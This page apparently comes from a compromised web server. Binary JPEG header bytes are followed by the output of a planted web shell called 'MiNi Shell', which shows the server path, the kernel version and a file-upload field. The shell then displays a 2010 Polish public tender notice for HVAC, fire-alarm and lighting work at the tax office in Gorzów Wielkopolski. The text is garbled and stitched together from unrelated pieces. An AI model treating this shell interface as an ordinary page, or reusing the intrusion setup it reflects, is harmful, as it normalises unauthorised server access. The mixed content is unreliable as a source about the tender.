JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100901/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100901/273242-N-2010.html

<p class="kh_header"><b>Gorzów Wielkopolski: Dostawa fabrycznie nowych urządzeń oraz kompleksowe wykonanie instalacji klimatyzacji i wentylacji mechanicznej wraz z systemem zasilania klimatyzacji 
i wentylacji mechanicznej, instalacji sygnalizacji pożaru oraz oświetlenia podstawowego i awaryjnego w sali obsługi klienta Urzędu Skarbowego w Gorzowie Wlkp.</b><br>
<b>Numer ogłoszenia: 273242 - 2010; data zamieszczenia: 01.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Skarbowy , ul. Jagiellończyka 10, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7115742, faks 095 7228997.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.usgorzow.mf.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa fabrycznie nowych urządzeń oraz kompleksowe wykonanie instalacji klimatyzacji i wentylacji mechanicznej wraz z systemem zasilania klimatyzacji 
i wentylacji mechanicznej, instalacji sygnalizacji pożaru oraz oświetlenia podstawowego i awaryjnego w sali obsługi klienta Urzędu Skarbowego w Gorzowie Wlkp..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa fabrycznie nowych urządzeń oraz kompleksowe wykonanie instalacji klimatyzacji i wentylacji mechanicznej wraz z systemem zasilania klimatyzacji i wentylacji mechanicznej, instalacji sygnalizacji pożaru oraz oświetlenia podstawowego i awaryjnego w sali obsługi klienta Urzędu Skarbowego w Gorzowie Wlkp. (wg CPV - 39717200-3 Urządzenia klimatyzacyjne, 42520000-7 Urządzenia wentylacyjne, 45331210-1 Instalowanie wentylacji, 45331220-4 Instalowanie urządzeń klimatyzacyjnych, 45331200-8 Instalowanie urządzeń wentylacyjnych i klimatyzacyjnych, 45310000-3 Roboty instalacyjne elektryczne, 45312100-8 Instalowanie przeciwpożarowych systemów alarmowych).

I.
1.Szczegółowy opis i zakres przedmiotu zamówienia określony został w następujących dokumentach, stanowiących integralną część SIWZ:
1)Załącznik nr 1 do Rozdziału II SIWZ - Projekt budowlany 
2)Załącznik nr 2 do Rozdziału II SIWZ - Przedmiar - instalacja wentylacyjna i klimatyzacyjna
3)Załącznik nr 3 do Rozdziału II SIWZ - Przedmiar - instalacje elektryczne w pomieszczeniu obsługi interesanta w budynku Urzędu Skarbowego w Gorzowie Wlkp.
4)Załącznik nr 4 do Rozdziału II SIWZ - Specyfikacja techniczna wykonania i odbioru robót klimatyzacji i wentylacji mechanicznej
5)Załącznik nr 5 do Rozdziału II SIWZ - Specyfikacja techniczna odbioru i wykonania robót budowlanych. Instalacje elektryczne. 

Oryginały w/w dokumentacji znajdują się do wglądu w siedzibie Zamawiającego w pok. 240 (I piętro).

2.Wykonawca zobowiązany jest do realizacji przedmiotu zamówienia zgodnie z obowiązującymi przepisami prawa, dokumentacją projektową, w tym projektem budowlanym zatwierdzonym decyzją o udzielenie pozwolenia na wykonanie robót budowlanych, zasadami wiedzy technicznej i sztuki budowlanej oraz wskazówkami inspektora nadzoru w sposób nie zagrażający bezpieczeństwu ludzi i mienia.
3.W takcie realizacji przedmiotu zamówienia Wykonawca dostarczy fabrycznie nowe urządzenia, materiały budowlane i instalacyjne.
4.Jeśli gdziekolwiek w SIWZ przedmiot zamówienia określony został przez wskazanie znaków towarowych lub pochodzenie materiałów, to Zamawiający dopuszcza możliwość zastosowania urządzeń, materiałów równoważnych w stosunku do zaprojektowanych z zachowaniem tych samych parametrów technicznych, technologicznych i jakościowych. Poprzez pojęcie: urządzeń i materiałów równoważnych należy rozumieć urządzenia i materiały gwarantujące realizację robót zgodnie z wydanym pozwoleniem na budowę oraz zapewniające uzyskanie parametrów technicznych nie gorszych od założonych w dokumentacji projektowej, specyfikacjach technicznych wykonania i odbioru robót oraz przedmiarach robót. Wykaz zastosowanych i przyjętych przez Wykonawcę materiałów lub urządzeń równoważnych musi zostać załączony do oferty. Koniecznym jest podanie nazwy producenta, precyzyjnego i jednoznacznego typu urządzenia oraz załączenie niezbędnych dokumentów takich jak: atesty PZH, deklaracje zgodności z normami zharmonizowanymi (CE), dokumenty zawierające parametry techniczno-eksploatacyjne ujęte w dokumentacji projektowej.
5.Zamawiający nie wyraża zgody, by proponowane w ofercie urządzenia równoważne były prototypami. Oferowane urządzenia równoważne muszą być na rynku polskim dostępne co najmniej 5 lat.
6.Wszelkie zabudowane materiały, elementy, urządzenia muszą posiadać wymagane prawem certyfikaty i spełniać przepisy dotyczące ochrony przeciwpożarowej (Rozporządzenie Ministra Spaw Wewnętrznych i Administracji z dnia 21 kwietnia 2006 r. w sprawie ochrony przeciwpożarowej budynków (Dz.U. Nr 80, poz. 563).
7.Wszystkie prace, dla przeprowadzenia których niezbędne będzie odcięcie mediów oraz nawiązanie się do czynnych instalacji, będą wykonywane po uprzednim uzgodnieniu z Zamawiającym. Wykonawca będzie zobowiązany do nieodpłatnego usunięcia ewentualnych usterek w istniejących instalacjach, do których będzie się włączał, jeżeli usterki te wystąpią w wyniku błędu w sztuce lub nie zachowania należytej staranności przy wykonywaniu robót.
8.Zamawiający nie będzie pokrywał kosztów robót naprawczych. Wszelkie ewentualne naprawy, których konieczność wynikłaby z przyczyn leżących po stronie Wykonawcy, przeprowadzi on na swój koszt.
9.Prowadzenie robót nie może naruszać interesu osób trzecich. 
10.Wszelkie uciążliwe dla otoczenia i głośne prace Wykonawca będzie realizował po godzinie 16.00 oraz w soboty i niedziele.
11.Zakończenie realizacji przedmiotu zamówienia nie później niż 20 listopada 2010 r.
12.Zamawiający umożliwi Wykonawcy zapoznanie się z miejscem i warunkami wykonania robót budowlanych po uprzednim telefonicznym zgłoszeniu - nr telefonu: 95/7115-625.

II. Fabrycznie nowe urządzenia klimatyzacyjne i wentylacyjne będące przedmiotem zamówienia będą zainstalowane w budynku przy ul. Jagiellończyka 10 w Gorzowie Wlkp. na I piętrze w sali obsługi klienta. Jest to pomieszczenie o powierzchni 191,7m2 i kubaturze 648m3. W pomieszczeniu na ścianie od strony zachodniej znajdują się okna. Pomieszczenie jest nasłonecznione od godziny 12.00.
Zainstalowane urządzenia winny zapewnić w sali obsługi klienta temperaturę od + 20°C do + 25°C przy obecnych warunkach lokalowych, jednoczesnym przebywaniu na sali 65 osób i temperaturze zewnętrznej + 32°C. Poziom hałasu i drgań zainstalowanych urządzeń nie powinien zakłócać pracy przebywających w pomieszczeniu osób.
Instalacja wentylacyjna winna pracować zawsze na 100 % świeżym powietrzu i powinna zapewnić dostawę i usunięcie normowych ilości powietrza do i z pomieszczenia.
	Urządzenia winny być dobrane na podstawie projektu budowlanego klimatyzacji i wentylacji mechanicznej będącego w posiadaniu Zamawiającego, stanowiącego załącznik nr 1 do Rozdziału II SIWZ. Wykonawca zobowiązany jest do niezależnego sprawdzenia czy proponowane moce chłodnicze i wydajności są wystarczające do spełnienia wymagań zawartych w projekcie budowlanym. 
	Wszystkie urządzenia i materiały winny posiadać wymagane przepisami prawa atesty i dopuszczenia.
	Zainstalowane fabrycznie nowe urządzenia klimatyzacyjne i wentylacyjne winny spełniać parametry określone w projekcie.

III. Instalacje zasilania systemu klimatyzacji i wentylacji mechanicznej, instalacji sygnalizacji pożaru oraz oświetlenia podstawowego i awaryjnego winny być wykonane zgodnie z projektem budowlanym będącym w posiadaniu Zamawiającego, stanowiącym załącznik nr 1 do Rozdziału II SIWZ.
	Całość prac winna być wykonana i odebrana zgodnie z PN i współczesną wiedzą techniczną. Wszelkie istotne zmiany w postanowieniach projektu winny być uzgadniane przed ich wprowadzeniem z projektantem.
	Po wykonaniu całości robót należy dokonać pomiarów i prób pomontażowych, a protokoły z ich wynikami przedstawić przy odbiorze.
Wszystkie urządzenia i materiały winny posiadać wymagane przepisami prawa atesty i dopuszczenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.71.72.00-3, 42.52.00.00-7, 45.33.12.10-1, 45.33.12.20-4, 45.33.12.00-8, 45.31.00.00-3, 45.31.21.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełnienia warunków udziału w postępowaniu o udzielenie zamówienia Zamawiający dokona na podstawie złożonych przez Wykonawcę oświadczeń oraz dokumentów. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia niniejszego warunku Wykonawca winien wykazać wykonanie co najmniej dwóch inwestycji/robót budowlanych, polegających na budowie instalacji klimatyzacji i wentylacji mechanicznej o wartości minimum 100 000 zł brutto.
Oceny spełnienia warunków udziału w postępowaniu o udzielenie zamówienia Zamawiający dokona na podstawie złożonych przez Wykonawcę oświadczeń oraz dokumentów. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełnienia warunków udziału w postępowaniu o udzielenie zamówienia Zamawiający dokona na podstawie złożonych przez Wykonawcę oświadczeń oraz dokumentów. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia niniejszego warunku Wykonawca winien wykazać dysponowanie osobami posiadającymi uprawnienia do pełnienia funkcji kierownika budowy (uprawnienia budowlane w odpowiedniej specjalności) oraz kierowników robót w zakresie objętym przedmiotem zamówienia.
Oceny spełnienia warunków udziału w postępowaniu o udzielenie zamówienia Zamawiający dokona na podstawie złożonych przez Wykonawcę oświadczeń oraz dokumentów. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia niniejszego warunku Wykonawca winien wykazać, że jest zdolny pokryć potencjalną szkodę wynikłą podczas realizacji niniejszego zamówienia w wysokości nie mniejszej niż 200.000 zł na jedno i wszystkie zdarzenia. 
Oceny spełnienia warunków udziału w postępowaniu o udzielenie zamówienia Zamawiający dokona na podstawie złożonych przez Wykonawcę oświadczeń oraz dokumentów. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.
Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązane tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (załącznik nr 7 do oferty)
b)jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa powyżej, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt 1 lit. b, c, d.
c)wypełniony i podpisany formularz oferty (rozdział III SIWZ) wraz z załącznikami,
d)pełnomocnictwo do reprezentowania Wykonawcy, jeżeli nie wynika ono z innych złożonych dokumentów, spełniające wymogi określone w pkcie IV ppkt 5, 6,
e)dokument potwierdzający autoryzację producenta lub generalnego dystrybutora na dostawę, montaż i serwis oferowanych urządzeń klimatyzacyjnych i wentylacyjnych.
f)wykaz oferowanych urządzeń wraz z folderami lub innymi dokumentami określającymi parametry techniczne urządzeń (lub adresami stron internetowych z opisem parametrów technicznych urządzeń). Oferowane urządzenia muszą być zgodne z parametrami określonymi w dokumentacji projektowej przedmiotu zamówienia oraz Rozdziałem II SIWZ (załącznik nr 8 do oferty).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Okres gwarancji na dostarczone fabrycznie nowe urzadzenia klimatyzacyjne - 3</li>
<li>3 - Okres gwarancji na dostarczone fabrycznie nowe urzadzenia wentylacyjne - 3</li>
<li>4 - Okres gwarancji na wykonane roboty budowlano-instalacyjne - 3</li>
<li>5 - Cena brutto jednego przeglądu konserwacyjnego - 6</li>
<li>6 - Termin realizacji zamówienia - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza zmiany postanowień umowy oraz określa warunki zmian:
1.1. zmianę terminu wykonania zamówienia w przypadku:
a)okoliczności, których nie można było przewidzieć (roboty dodatkowe, awaryjne, zamienne itp.),
b)działania siły wyższej (huragan, pożar, deszcz nawalny itp.),
c)niesprzyjających warunków atmosferycznych udokumentowanych w dzienniku budowy (opady deszczu, silny wiatr, mróz, uniemożliwiające realizację robót),
1.2.zmianę personelu wskazanego przez Wykonawcę w tym m.in. kierownika budowy oraz kierowników robót występujących z ramienia Wykonawcy, pod warunkiem, że nowa wskazana osoba będzie posiadać przynajmniej takie same kwalifikacje jak osoba, którą zastępuje:
a)zaistniałą z przyczyn losowych, pod warunkiem złożenia przez Wykonawcę oświadczenia nowego kierownika budowy i przedłożenia wymaganych dokumentów,
b)jeżeli Zamawiający uzna, że kierownik budowy nie wykonuje swoich obowiązków w sposób należyty,
1.3.zmianę inspektora nadzoru inwestorskiego zaistniałą z przyczyn losowych, pod warunkiem, że nowa wskazana osoba będzie posiadać przynajmniej takie same kwalifikacje jak osoba, którą zastępuje,
1.4.losowej przyczyny zmiany podwykonawcy z zastrzeżeniem, że jeżeli Wykonawca w procedurze udzielania zamówienia publicznego, w wyniku której zawarto niniejszą umowę, posłużył się doświadczeniem podwykonawcy, nowy podwykonawca musi również wykazać się doświadczeniem wymaganym przez Zamawiającego w procedurze o udzielenie zamówienia publicznego, będącego przedmiotem umowy.
Zaistnienie powyższych okoliczności musi być udokumentowane stosowną notatką zatwierdzoną przez Wykonawcę i Zamawiającego.
2.Zmiany do umowy, o których mowa w ppkt 1, muszą być wprowadzone w formie pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.usgorzow.mf.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Skarbowy
ul. Jagiellończyka 10
66-400 Gorzów Wlkp.
pok. 240 (I piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.09.2010 godzina 10:15, miejsce: Urząd Skarbowy
ul. Jagiellończyka 10
66-400 Gorzów Wlkp.
pok. 240 (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





